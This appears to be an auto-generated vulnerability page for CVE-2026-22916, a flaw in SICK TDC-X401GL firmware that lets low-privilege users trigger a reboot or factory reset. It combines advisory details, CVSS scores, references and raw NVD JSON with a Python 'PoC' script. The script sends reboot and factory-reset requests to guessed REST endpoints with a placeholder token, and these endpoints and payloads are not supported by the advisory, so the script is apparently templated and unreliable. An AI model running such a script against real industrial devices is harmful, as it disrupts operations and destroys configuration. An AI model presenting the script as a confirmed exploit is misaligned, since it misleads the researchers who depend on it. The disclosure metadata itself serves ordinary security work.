CVE-2026-22916

Description

An attacker with low privileges may be able to trigger critical system functions such as reboot or factory reset without proper restrictions, potentially leading to service disruption or loss of configuration.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE

SICK工业控制系统 - 受影响版本待官方确认

建议参考SICK官方安全公告: sick.com/psirt

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-22916 PoC - SICK Product Privilege Bypass
# Target: SICK industrial control system
# Vulnerability: Low-privilege users can trigger reboot/factory reset

TARGET_IP = "target_ip"
TARGET_PORT = 8080
BASE_URL = f"http://{TARGET_IP}:{TARGET_PORT}"

def trigger_reboot():
    """Trigger system reboot without proper authorization"""
    endpoint = f"{BASE_URL}/api/system/reboot"
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer low_privilege_token"
    }
    payload = {"command": "reboot", "force": True}
    response = requests.post(endpoint, json=payload, headers=headers, timeout=30)
    return response.status_code, response.text

def trigger_factory_reset():
    """Trigger factory reset without proper authorization"""
    endpoint = f"{BASE_URL}/api/system/reset"
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer low_privilege_token"
    }
    payload = {"action": "factory_reset", "confirm": True}
    response = requests.post(endpoint, json=payload, headers=headers, timeout=30)
    return response.status_code, response.text

if __name__ == "__main__":
    print("CVE-2026-22916 PoC - Testing privilege bypass...")
    status, resp = trigger_reboot()
    print(f"Reboot trigger: Status {status}, Response: {resp}")
    status, resp = trigger_factory_reset()
    print(f"Factory reset trigger: Status {status}, Response: {resp}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22916
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22916
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22916/
[4] VulDB https://vuldb.com/cve/CVE-2026-22916
[5] https://sick.com/psirt
[6] https://www.cisa.gov/resources-tools/resources/ics-recommended-practices
[7] https://www.first.org/cvss/calculator/3.1
[8] https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json
[9] https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf
[10] https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22916", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:06.527", "lastModified": "2026-01-23T15:13:01.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker with low privileges may be able to trigger critical system functions such as reboot or factory reset without proper restrictions, potentially leading to service disruption or loss of configuration."}, {"lang": "es", "value": "Un atacante con privilegios bajos podría activar funciones críticas del sistema como el reinicio o el restablecimiento de fábrica sin las restricciones adecuadas, lo que podría llevar a la interrupción del servicio o la pérdida de configuración."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "59BB5012-A895-4A93-B36F-A062A9389DB1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}